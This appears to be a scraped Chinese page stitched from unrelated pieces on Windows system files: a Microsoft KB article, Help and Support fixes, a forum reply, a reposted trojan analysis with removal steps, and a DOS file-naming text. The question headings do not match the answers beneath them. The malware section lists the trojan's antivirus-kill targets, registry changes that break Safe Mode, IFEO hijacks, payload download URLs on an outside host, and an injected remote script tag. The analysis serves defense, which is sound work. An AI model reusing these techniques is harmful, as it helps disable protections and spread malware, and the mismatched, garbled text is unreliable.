1.C盘Windows/system32里面的文件夹的作用

2.是不是最新的?只要搜索“杀毒,木马,瑞星,江民……”等关键字IE就会自动关闭

3.这些是什么文件?

4.windowshlp是什么?windowshlp怎么安装?

5.系统文件的扩展名有那些!

6.我在装爱普生LQ-630K打印机时出现找不到UNRDIV.HLP文件

文件丢失dll_windowshlp文件丢失

错误信息:下列文件丢失或已损坏:C:\Windows\Ifshlp.sys

察看本文应用于的产品

文章编号 : 258471

最后修改 : 2004年10月4日

修订 : 1.1

症状

您在重新启动计算机时,可能会看到以下某条错误信息:

The following file is missing or corrupted:C:\Windows\Ifshlp.sys(下列文件丢失或已损坏:C:\Windows\Ifshlp.sys)

The following file is missing or corrupted:C:\Windows\System\Vmm32.vxd(下列文件丢失或已损坏:C:\Windows\System\Vmm32.vxd)

Type the name of the Windows loader (e.g., C:\Windows\System\Vmm32.vxd(键入 Windows 加载器的名称,例如 C:\Windows\System\Vmm32.vxd)

While initializing device IFSMGR(正在初始化设备 IFSMGR)

The Microsoft Installable File System Manager cannot find the helper driver.(Microsoft 可安装文件系统管理器无法找到驱动程序。)

Please ensure that IFSHLP.SYS has been installed.System halted.(请确保已安装 IFSHLP.SYS。系统已暂停。)

The following file is missing or corrupted:C:\Windows\System\Imagehlp.dll(下列文件丢失或已损坏:C:\Windows\System\Imagehlp.dll)

当您看到这样的错误信息时,必须重新启动计算机。

原因

出现这些错误信息的原因是: ? Msdos.sys 文件中 WinBootDir 项不正确。

文件 Ifshlp.sys 已丢失或损坏。

文件 Vmm32.vxd 已丢失或损坏。

文件 Imagehlp.dll 已丢失或损坏。

解决方案

要解决此问题,请使用 Windows ME 启动盘重新启动计算机,然后执行以下各个步骤,直至问题得到解决: 1. 修改 Msdos.sys 文件中的 WinBootDir 项,使其指向 Windows 文件夹的正确位置。

2. 将文件 Ifshlp.sys 的一个新副本提取到 Windows 文件夹,将文件 Imagehlp.dll 的一个新副本提取到 Windows\System 文件夹。有关提取文件的其他信息,请单击下面的文章编号,以查看 Microsoft 知识库中相应的文章:

129605 (://support.microsoft/kb/129605/EN-US/) 如何提取原始的 Windows 压缩文件

3. 如果您确定文件 Vmm32.vxd 已丢失或损坏,就必须在 C:\Windows\System 文件夹内将该文件重命名为 Vmm32.old,然后重新安装 Windows ME,以重新创建此文件。

C盘Windows/system32里面的文件夹的作用

一、帮助和支持故障集锦

Windows

XP自带的“

帮助和支持中心

”组件往往是我们了解查看系统功能、侦测有关故障的最直接方法。不过当你正在为某个系统组件故障的出现发愁而想从Windows帮助中找寻答案时,却发现原来这根救命稻草有时候也靠不住,下面就来看看几个比较常见的相关故障和技巧。

故障1:运行“开始→帮助和支持”菜单时,系统没有任何反应。

解决方法:首先尝试在“开始→运行”中输入“hepctr

-regserver”命令对帮助组件再次注册,如果故障依旧存在,那么打开C:\\Windows\\inf目录(该目录属性为隐藏,需要在

管理器

中设置“显示所有文件和文件夹”方可访问),找到pchealth.

inf文件

,右键单击它,选择“安装”命令重新安装帮助组件,安装过程中系统会提示插入Windows

XP安装盘。

故障2:按下F1或者使用“开始→帮助和支持”菜单访问时,系统提示Could

not

start

the

Help

and

Support

Service

on

Local

Computer.

Error

126:

The

specified

module

could

not

be

found(Help

and

Support服务不能启动)。

解决方法:首先确认一下Help

and

Support服务是否被启用,方法是:运行“services.msc”命令打开“服务”管理窗口,在右边窗口中找到名为“Help

and

Support”的服务,双击打开,在“常规”

选项卡

中将“启动类型”设置为“自动”,“服务状态”设置为“已启动”(图1)。需要注意的是,该服务依赖于Remote

Procedure

Call

(RPC)服务,请确认该服务被启用,否则设置会失败。

如果故障依旧存在,那么再运行“C

/Scannow”命令进行Windows

文件保护验证工作,验证过程中如果遇到又

系统文件

被改动或者丢失的情况,系统会提示插入Windows

XP安装盘,并将安装盘里相关文件拷贝到系统中(图2)。如果遇到故障还未解决,那么从

://.kellys-korner-xp/regs_edits/

winhlp32.exe(Windows

XP)或者

://.kellys-korner-xp/regs_edits/

winhlp32sp1.exe(Windows

XP

SP1)下载并安装帮助与支持组件。

是不是最新的?只要搜索“杀毒,木马,瑞星,江民……”等关键字IE就会自动关闭

拉倒吧,至少500+的文件,一个1分都不够说的。并且,随着计算机的使用,那里面的文件还会不断改变,这怎么说。即使刚装的电脑,系统不一样,文件个数也不一样啊。要是真能回答你这问题,那要什么样的人啊,这人要是真这么强悍,就不会闲的在百度上回答问题了,唉你这100分,估计没有真正能领到了 。

简单说下吧。

C:\WINDOWS\system32...

这个 system32 文件夹中包含了大量的用于 Windows 的文件. 这里主要用于存储 DLL 文件, 控制面板小程序(.CPL), 设备驱动 (.drv), 帮助文件 (.hlp 和 .cnt), MS-DOS 工具 (), 语言支持文件 (.nls), 屏幕保护 (.scr), 安装信息文件 (.inf), 以及其它用于支持, 配置, 或操作的文件

还有就是你要的那些具体的文件,一一列举是不可能的,100块钱都不行。你去看看百科中对那些文件的解释,也不过是大概意思而已。

://baike.baidu/view/1133961.htm

这是百科中的。只能帮到这了。

这些是什么文件?

最近发现很多人出现了打不开shadu软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前

这是一个可以说结合了几乎所有病 毒的特征的 除了感染文件之外 可以说是比熊猫有过之而无不及!

特征:

1.破坏安全模式

2.结束常见杀毒软件以及反工具进程

3.监控窗口

4.关闭自动更新以及Windows安全中心

5.屏蔽显示隐藏文件

6.下载木马

7.IFEO映像劫持

8.GHOST文件引导破坏

9.各盘符均有引导启动关联文件,即便你重装系统盘也照样发作

分析报告

File: 1201AEC1.exe

Size: 36435 bytes

MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB

SHA1: E760703C8776C652B424FA62AF945434FB786BE5

CRC32: 27CA1195

加壳方式:UPX

运行后

在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文

件名的dll 和一个同名的dat 文件

我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll

这个随机的数字应该与机器码有关

该dll插入Explorer进程 Timplatform以及ctfmon进程

监视并关闭以下进程以及窗口

AntiVirus

TrojanFirewall

Kaspersky

JiangMin

KV200

kxp

Rising

RAV

RFW

KAV200

KAV6

McAfe

Network Associates

TrustPort

NortonSymantec

SYMANT~1

Norton SystemWorks

ESET

Grisoft

F-Pro

Alwil Software

ALWILS~1

F-Secure

ArcaBit

Softwin

ClamWin

DrWe

Fortineanda Software

Vba3

Trend Micro

QUICKH~1

TRENDM~1

Quick Heal

eSafewido

Prevx1

ers

g

Ikarus

SophoSunbeltPC-cilli

ZoneAlar

Agnitum

WinAntiVirus

AhnLab

Normasurfsecret

Bullguard\Blac

360safe

SkyNet

Micropoint

Iparmor

ftc

mmjk2007

Antiy Labs

LinDirMicro Lab

Filseclab

ast

System Safety Monitor

ProcessGuard

FengYun

Lasoft

NOD3

mmsk

The Cleaner

Defendio

kis6Beheadsreng

IceSword

HijackThis

killbox

procexp

Magicset

EQSysSecureProSecurity

Yahoo!

Google

baidu

P4P

Sogou PXP

ardsys

超级兔子木马

KSysFiltsys

KSysCallsys

AVK

K7

Zondex

blcorp

Tiny Firewall Pro

Jetico

HAURI

CA

kmx

PCClear_Plus

Novatix

Ashampoo

WinPatrol

Spy Cleaner Gold

CounterSpy

EagleEyeOS

Webroot

BufferZ

p

AgentSvr

CCenter

R

RMonD

RStub

RTask

rfwcfg

rfwsrv

RsAgent

Rsaupd

runiep

SmartUp

FileDsty

RegClean

360tray

360Safe

360rpt

kabaload

safelive

Ras

KASMain

KASTask

KAV32

KAVDX

KAVStart

KISLnchr

KMailMon

KMFilter

KPFW32

KPFW32X

KPFWSvc

KWatch9x

KWatch

KWatchX

TrojanDetector

UpLive.EXE

KVSrvXP

KvDetect

KRegEx

kvol

kvolself

kvupload

kvwsc

UIHost

IceSword

iparmo

mmsk

adam

MagicSet

PFWLiveUpdate

SREng

WoptiClean

scan32

hcfg32

mcconsol

HijackThis

mmqczj

Trojanwall

FTCleanerShell

loaddll

rfwProxy

KsLoader

KvfwMcl

autoruns

AppSvc32

ccSvcHst

isPwdSvc

symlcsvcnod32kui

grssvc

RfwMain

KAVPFW

Iparmor

nod32krn

PFW

RMon

KAVSetup

NAVSetup

SysSafe

QHSET

zxsweep.

AvMonitor

UmxCfg

UmxFwHlp

UmxPol

UmxAgent

UmxAttachment

KPFW32

KPFW32X

KvXP_1

KVMonXP_1

KvReport

KVScan

KVStub

KvXP

KVMonXP

KVCenter

TrojDie

p.

krepair.COM

KaScrScn.SCR

Trojan

Virus

kaspersky

jiangmin

rising

ikaka

duba

kingsoft

360safe

木马

木马

shadu

shadu

查 毒

防 毒

反 病 毒

专杀

专杀

卡 巴 斯 基

江 民

瑞 星

卡卡社区

金 山 毒 霸

毒霸

金 山 社 区

3 6 0 安全

恶 意 软 件

流 氓 软 件

举 报

报 警

杀 软

杀 软

防 骇

在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件

在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件

删除C:\WINDOWS\system32\verclsid.exe

将其重命名为verclsid.exe.bak

释放41115BDD.exe(随机8位)和autorun.inf到除系统分区外的其他分区

注册表相关操作

删除

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

破坏安全模式

修改

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

为0x00000000

HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002

HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001

屏蔽显示隐藏文件

修改常见杀毒软件服务的start键值为0x00000004

如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start

和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004

关闭自动更新

添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\grssvc.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\R.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RMon.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RMonD.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RStub.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RTask.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件

下载dl1.exe到临时文件夹

首先下载://google.xxxx38.org/update/down.txt看是否需要更新

然后分别下载://google.xxxx38.org/update/wow.exe

://google.xxxx38.org/update/mh.exe

://google.xxxx38.org/update/wm.exe

://google.xxxx38.org/update/my.exe

://google.xxxx38.org/update/wl.exe

://google.xxxx38.org/update/zt.exe

://google.xxxx38.org/update/jh.exe

://google.xxxx38.org/update/tl.exe

://google.xxxx38.org/update/1.exe

://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe

具体每个文件的生成物就不一一列举了

不过值得一提的是ycnt9.exe这个木马

他生成C:\WINDOWS\system32\win1ogo.exe

并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗

插入<script language=jascript src=://google.171738.org/ad2.js></script>代码

也就是局域网内所有用户在打开网页时都会被插入这段代码

所有木马文件植入完毕后 生成物如下

C:\WINDOWS\system32\drivers\npf.sys

C:\WINDOWS\system32\Kvsc3.dll

C:\WINDOWS\system32\msdebug.dll

C:\WINDOWS\system32\nwiztlbu.exe

C:\WINDOWS\system32\Packet.dll

C:\WINDOWS\system32\RemoteDbg.dll

C:\WINDOWS\system32\testdll.dll

C:\WINDOWS\system32\WanPacket.dll

C:\WINDOWS\system32\win1ogo.exe

C:\WINDOWS\system32\windds32.dll

C:\WINDOWS\system32\winpcap.exe

C:\WINDOWS\system32\wpcap.dll

C:\WINDOWS\system32\xpdhcp.dll

C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\testexe.exe

C:\Program Files\Common Files\cssrs.exe

sreng日志反映如下(在处理一些东西后扫描的这里提前列出)

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

<testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []

<Kvsc><C:\WINDOWS\Kvsc3.exe> []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]

<{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft

Shared\MSINFO\41115BDD.dll> []

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

<Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]

[PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

2158)]

[C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]

[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

解决办法如下:

1.确定那个8位随机数的dll的名称

这里我们选用winrar确定那个dll的名称

方法是:打开winrar.exe

工具 查看

在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录

我这台被感染的电脑的文件名为41115bdd.dll

2.使用强制删除工具删除那个dll文件

这里我们选用Xdelbox1.2这个软件

XDelBox1.2(Dos级别灭杀工具):

1、dos级文件删除方式,打造清除新模式

2、无须进入安全模式,即可删除所有文件

3、支持一次重启批量删除多个文件

4、复制路径的删除添加方式更适用于网络求助(支持拖曳)

注意:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从剪贴板导入。导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作,删除完成后会自动重启进入你安装的操作系统。操作前注意保存电脑中正在打开的文档。有关XDelBox的详细说明请看xdelbox1.2目录下help.chm

重起机器后

3.恢复被映像劫持的软件

这里我们使用autoruns这个软件 由于这个软件也被映像劫持了 所以我们随便把他改个名字

打开这个软件后 找到Image hijack (映像劫持)

删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe

以外的所有项目

4.此时我们就可以打开sreng了 呵呵

打开sreng

系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是

5.恢复显示隐藏文件

把下面的 代码拷入记事本中然后另存为1.reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

]

"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"

"Text"="@shell32.dll,-30500"

"Type"="radio"

"CheckedValue"=dword:00000001

"ValueName"="Hidden"

"DefaultValue"=dword:00000002

"HKeyRoot"=dword:80000001

"HelpID"="shell.hlp#51105"

双击1.reg把这个注册表项导入

好了 此时对于我们的所有限制已经解除了

6.清除其下载的木马了

重起机器 进入安全模式

双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"

清除"隐藏受保护的操作系统文件

用WINRAR打开 然后查看以下路径,将发现的名字都删(里面是下载下来的木马)

C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe

C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll

C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe

C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合)

C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\testexe.exe

C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合)

C:\WINDOWS\system32\DirectX\DirectX.ini

C:\WINDOWS\system32\drivers\npf.sys

C:\WINDOWS\system32\Kvsc3.dll

C:\WINDOWS\system32\msdebug.dll

C:\WINDOWS\system32\nwiztlbu.exe

C:\WINDOWS\system32\Packet.dll

C:\WINDOWS\system32\RemoteDbg.dll

C:\WINDOWS\system32\testdll.dll

C:\WINDOWS\system32\WanPacket.dll

C:\WINDOWS\system32\win1ogo.exe

C:\WINDOWS\system32\windds32.dll

C:\WINDOWS\system32\winpcap.exe

C:\WINDOWS\system32\wpcap.dll

C:\WINDOWS\system32\xpdhcp.dll

C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合)

C:\WINDOWS\Kvsc3.exe

C:\WINDOWS\testexe.exe

C:\Program Files\Common Files\cssrs.exe

C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话)

最后别忘了

7.还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合)

一定不要双击 最好的方法是用winrar看

8.装杀毒软件 保护好你的电脑

到此为止,已经完全清除。。。

附带本次所有软件(连接绝不丢失):

xdelbox1.2

://.hltsoft.cn/download/soft/safetools1/xdelbox1.2.RAR

SREng

://.hltsoft.cn/download/soft/safetools1/SREng.rar

Autoruns

://.hltsoft.cn/download/soft/safetools1/Autoruns861-YYZ.rar

转贴请注明(风月阁) 来自:://kairizero.blog.sohu/

windowshlp是什么?windowshlp怎么安装?

说起来Windows工作界面下的文件名简直是随心所欲,比如:某编辑部的2000年工作。文件名即可用中文直接表达,而且长度最长可达256个字符,让人看起来真是一目了然。然而在Windows环境中,安装的软件中却大量存在着类似CALENDAR.EXE、GAMES.GRP等等的文件名,这又是为什么呢?原来这些文件名都是根据DOS环境的文件名命名规则而定的。

DOS环境下的文件名

在DOS下,文件名用8+3结构,即:最长8位的文件名,由小数点分隔后再跟上最长3位的后缀名,如:READ.ME、SETUP.EXE,一般情况下文件名不允许使用汉字,只能由字母、数字和一些符号组成。如READ.ME用中文理解就是"读我",即提示用户在使用软件前先看看这个文件的内容,以获取更多的提示信息。而更重要的是,DOS下规定用后缀名来区分各种不同的文件。

在DOS下最容易遇到的首先是可执行文件,后缀名有两类:*.exe、*(此处的*表示文件名任意),它们是由汇编语言或其它高级语言编出的程序经过编译后直接在DOS下运行的文件。有时由于软件功能多、内存偏小,不能一次性全部调入内存还可能有同文件名的ovl文件,如ws.exe、ws.ovl。另外还有一种文件可以直接运行,*.bat,即批处理文件,其中有许多命令或可执行文件名,主要用于提高工作效率,其中最有用的是Autoexec.bat,这个文件在开机时会被自动执行(自动执行在英文中就是Automatically execute)。而另外一种可以加载但不能直接运行的文件即是系统扩展管理文件*.sys(sys即系统system),它主要提供某些非标准设备如鼠标、扩充内存等的驱动程序,如mouse.sys、himem.sys。为了统一管理还专门规定了一个config.sys的文本文件来一次性地在开机时自动调入这些必需的设备驱动程序,这些文件一旦被误删或换名或被侵袭则将直接导致系统工作不正常。

DOS下字处理产生的文件原本是可以不用后缀的,但人们常用*.txt表示(txt即文本text)。被所有的平台和所有应用程序支持。而为了管理方便,人们也可以用自己的名字做后缀来表示是自己建的文本文件,如我输入的很多文章即为*.mcj,为了便于用户在意外删掉原文件的情况下能尽快恢复原文件,许多字处理系统都提供了一种自动备份的功能,如我第二次编辑JIHUA.MCJ时(JIHUA:的汉语拼音),系统会先拷贝一份原文件为JIHUA.BAK。使用具有特殊格式功能的字处理软件,如求伯君先生早年推出的WPS,就会规定其后缀为.wps,用以标识是用WPS生成的文本文件。当使用字处理软件编辑高级语言程序时,后缀通常为相应语言的前三个字母(如:*.BAS即BASIC语言源程序,*.PAS为PASCAL语言程序,*.FOR为Fortran语言程序,*.C即为C语言,*.ASM即为汇编语言程序)。

